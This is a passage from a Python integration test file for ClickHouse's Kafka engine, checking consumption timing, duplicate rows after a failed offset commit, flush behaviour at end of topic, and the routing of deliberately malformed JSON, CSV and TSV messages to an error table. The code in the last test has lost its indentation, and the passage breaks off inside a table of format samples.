        DROP TABLE test.kafka_consumer SYNC;
        DROP TABLE test.destination SYNC;
    ''')

    kafka_thread.join()
    # All keys 1..i[0]-1 must be present exactly once.
    assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
def test_bad_reschedule(kafka_cluster):
    """A pre-produced backlog of 20000 messages must be consumed quickly,
    i.e. without pathological rescheduling pauses between polls.
    """
    backlog = [json.dumps({'key': n + 1, 'value': n + 1}) for n in range(20000)]
    kafka_produce(kafka_cluster, 'test_bad_reschedule', backlog)

    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'test_bad_reschedule',
                     kafka_group_name = 'test_bad_reschedule',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 1000,
                     kafka_flush_interval_ms = 1000;
        CREATE MATERIALIZED VIEW test.destination Engine=Log AS
            SELECT
                key,
                now() as consume_ts,
                value,
                _topic,
                _key,
                _offset,
                _partition,
                _timestamp
            FROM test.kafka;
    ''')

    instance.wait_for_log_line("Committed offset 20000")

    # The whole backlog should be drained in well under 8 seconds.
    assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
    # Scenario under test: a block is already written into the MV target table,
    # but the subsequent offset commit to Kafka fails (broker paused). After the
    # broker comes back, the same block is consumed again, so duplicates are
    # expected — and the final assert pins that documented duplication down.
    messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
    kafka_produce(kafka_cluster, 'duplicates_when_commit_failed', messages)
    instance.query('''
DROP TABLE IF EXISTS test.view SYNC;
DROP TABLE IF EXISTS test.consumer SYNC;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
''')
    # sleepEachRow(0.25) deliberately slows consumption, opening a time window
    # in which the broker can be paused while the MV is still processing
    instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
    instance.wait_for_log_line("Polled batch of 20 messages")
    # the tricky part here is that disconnect should happen after write prefix, but before we do commit
    # we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
    # while materialized view is working to inject zookeeper failure
    kafka_cluster.pause_container('kafka1')
    # if we restore the connection too fast (<30sec) librdkafka will not report any timeout
    # (alternative is to decrease the default session timeouts for librdkafka)
    #
    # when the delay is too long (>50sec) broker will decide to remove us from the consumer group,
    # and will start answering "Broker: Unknown member"
    instance.wait_for_log_line("Exception during commit attempt: Local: Waiting for coordinator", timeout=45)
    instance.wait_for_log_line("All commit attempts failed", look_behind_lines=500)
    kafka_cluster.unpause_container('kafka1')
    # kafka_cluster.open_bash_shell('instance')
    instance.wait_for_log_line("Committed offset 22")
    result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
    logging.debug(result)
    instance.query('''
DROP TABLE test.consumer SYNC;
DROP TABLE test.view SYNC;
''')
    # After https://github.com/edenhill/librdkafka/issues/2631
    # timeout triggers rebalance, making further commits to the topic after getting back online
    # impossible. So we have a duplicate in that scenario, but we report that situation properly.
    # 22 unique keys but 42 rows in total: the re-consumed block adds 20 duplicates.
    assert TSV(result) == TSV('42\t22\t22')
# if we come to the partition end we will repeat polling until reaching kafka_max_block_size or flush_interval
# that behavior is a bit questionable - we could just take bigger pauses between polls instead -
# to do more work in a single pass, and give the thread more rest.
# But in cases of some spiky loads in the kafka topic the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# also we can come to EOF because we drained the librdkafka internal queue too fast
def test_premature_flush_on_eof(kafka_cluster):
    # Reaching the end of the topic (EOF) must NOT force an early flush: the
    # engine should keep respecting kafka_flush_interval_ms and try to build
    # a bigger block, so both rows end up in a single insert (single part).
    instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
    # messages created here will be consumed immediately after MV creation
    # reaching topic EOF.
    # But we should not do flush immediately after reaching EOF, because
    # next poll can return more data, and we should respect kafka_flush_interval_ms
    # and try to form bigger block
    messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
    kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
    instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
    # all subscriptions/assignments done during select, so it start sending data to test.destination
    # immediately after creation of MV
    instance.wait_for_log_line("Polled batch of 1 messages")
    instance.wait_for_log_line("Stalled")
    # produce more messages after delay
    kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
    # data was not flushed yet (it will be flushed 7.5 sec after creating MV)
    assert int(instance.query("SELECT count() FROM test.destination")) == 0
    instance.wait_for_log_line("Committed offset 2")
    # it should be single part, i.e. single insert
    result = instance.query('SELECT _part, count() FROM test.destination group by _part')
    assert TSV(result) == TSV('all_1_1_0\t2')
    instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
def test_kafka_unavailable(kafka_cluster):
    """Pause the broker while a Kafka table and its MV exist; after the broker
    comes back, consumption must resume and eventually deliver all 20000 rows."""
    payload = [json.dumps({'key': idx + 1, 'value': idx + 1}) for idx in range(20000)]
    kafka_produce(kafka_cluster, 'test_bad_reschedule', payload)

    kafka_cluster.pause_container('kafka1')
    instance.query('''
CREATE TABLE test.test_bad_reschedule (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_commit_on_select = 1,
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination_unavailable Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.test_bad_reschedule;
''')

    instance.query("SELECT * FROM test.test_bad_reschedule")
    instance.query("SELECT count() FROM test.destination_unavailable")

    # enough to trigger issue
    time.sleep(30)
    kafka_cluster.unpause_container('kafka1')

    # poll until every produced row has reached the MV target table
    while True:
        consumed = int(instance.query("SELECT count() FROM test.destination_unavailable"))
        if consumed >= 20000:
            break
        print("Waiting for consume")
        time.sleep(1)
def test_kafka_issue14202(kafka_cluster):
    """
    Regression test for issue 14202: INSERT INTO a Kafka engine table fed
    from an empty SELECT sub query was leading to failure.
    """
    instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')

    # the sub query selects from an empty table, so this INSERT writes nothing
    insert_query = 'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )'
    instance.query(insert_query)

    # check instance is alive
    assert TSV(instance.query('SELECT 1')) == TSV('1')

    instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
    """Consume CSV rows with kafka_thread_per_consumer=1 and four consumers,
    checking that every produced row is eventually returned by SELECT."""
    instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv_with_thread_per_consumer',
kafka_group_name = 'csv_with_thread_per_consumer',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_commit_on_select = 1,
kafka_thread_per_consumer = 1;
''')

    # rows look like "0, 0", "1, 1", ..., "49, 49"
    messages = ['{i}, {i}'.format(i=i) for i in range(50)]
    kafka_produce(kafka_cluster, 'csv_with_thread_per_consumer', messages)

    collected = ''
    while True:
        collected += instance.query('SELECT * FROM test.kafka', ignore_error=True)
        if kafka_check_result(collected):
            break
    kafka_check_result(collected, True)
def random_string(size=8):
    """Return *size* random characters drawn from A-Z and 0-9."""
    alphabet = string.ascii_uppercase + string.digits
    return ''.join(random.choice(alphabet) for _ in range(size))
def test_kafka_engine_put_errors_to_stream(kafka_cluster):
    """With kafka_handle_error_mode='stream', rows that fail to parse must land
    in the errors MV while good rows land in the data MV (64 of each here)."""
    instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream',
kafka_group_name = 'kafka_engine_put_errors_to_stream',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 128,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')

    # even indices carry valid rows; odd indices carry an 'i' value that is not
    # a number, so it cannot be parsed into Int64 for table test.kafka
    messages = [
        json.dumps({'i': i, 's': random_string(8)})
        if i % 2 == 0
        else json.dumps({'i': 'n_' + random_string(4), 's': random_string(8)})
        for i in range(128)
    ]
    kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream', messages)
    instance.wait_for_log_line("Committed offset 128")

    assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('64')
    assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')

    instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def gen_normal_json():
    """Return a single JSON row that parses cleanly as (i Int64, s String)."""
    return '{"i":1000, "s":"ABC123abc"}'
def gen_malformed_json():
    """Return a JSON row whose 'i' field is a string, so Int64 parsing fails."""
    return '{"i":"n1000", "s":"1000"}'
def gen_message_with_jsons(jsons=10, malformed=0):
    """Build one Kafka message containing *jsons* space-terminated JSON rows.

    When *malformed* is truthy, exactly one row (at a random position) is
    replaced by a broken one, so the message is guaranteed to contain at
    least one parse error; otherwise the whole test would fail. We don't
    care where exactly the error sits (the whole broken message is skipped).
    """
    # position of the (single) broken row; irrelevant when malformed is falsy
    error_pos = random.randint(0, jsons - 1)
    rows = []
    for idx in range(jsons):
        if malformed and idx == error_pos:
            rows.append(gen_malformed_json())
        else:
            rows.append(gen_normal_json())
    # original wire format: every row is followed by a single trailing space
    return ''.join(row + ' ' for row in rows)
def test_kafka_engine_put_errors_to_stream_with_random_malformed_json(kafka_cluster):
    """Like test_kafka_engine_put_errors_to_stream, but every message packs 10
    JSON rows: a message with one broken row is skipped whole and reported once,
    while clean messages contribute all 10 rows to the data MV."""
    instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_group_name = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')

    # even-indexed messages contain one broken row each; odd-indexed are clean
    messages = [gen_message_with_jsons(10, 1 if i % 2 == 0 else 0) for i in range(128)]
    kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream_with_random_malformed_json', messages)
    instance.wait_for_log_line("Committed offset 128")

    # 64 good messages, each containing 10 rows
    assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('640')
    # 64 bad messages, each containing some broken row
    assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')

    instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def test_kafka_formats_with_broken_message(kafka_cluster):
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
# broken message
'{"id":"0","blockNo":"BAD","val1":"AM","val2":0.5,"val3":1}',
],
'expected':'''{"raw_message":"{\\"id\\":\\"0\\",\\"blockNo\\":\\"BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse input: expected '\\"' before: 'BAD\\", \\"AM\\", 0.5, 1]': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable':True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse JSON string: expected opening quote"}''',
'printable':True,
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# broken message
'id=0\tblockNo=BAD\tval1=AM\tval2=0.5\tval3=1\n',
],
'expected':'{"raw_message":"id=0\\tblockNo=BAD\\tval1=AM\\tval2=0.5\\tval3=1\\n","error":"Found garbage after field in TSKV format: blockNo: (at row 1)\\n"}',
'printable':True,
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
# broken message
'0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
# broken message
'0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# broken message
'"id","blockNo","val1","val2","val3"\n0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"\\"id\\",\\"blockNo\\",\\"val1\\",\\"val2\\",\\"val3\\"\\n0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
# broken message
"(0,'BAD','AM',0.5,1)",
],
'expected':r'''{"raw_message":"(0,'BAD','AM',0.5,1)","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\nInt64\\tUInt16\\tString\\tFloat32\\tUInt8\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# broken message
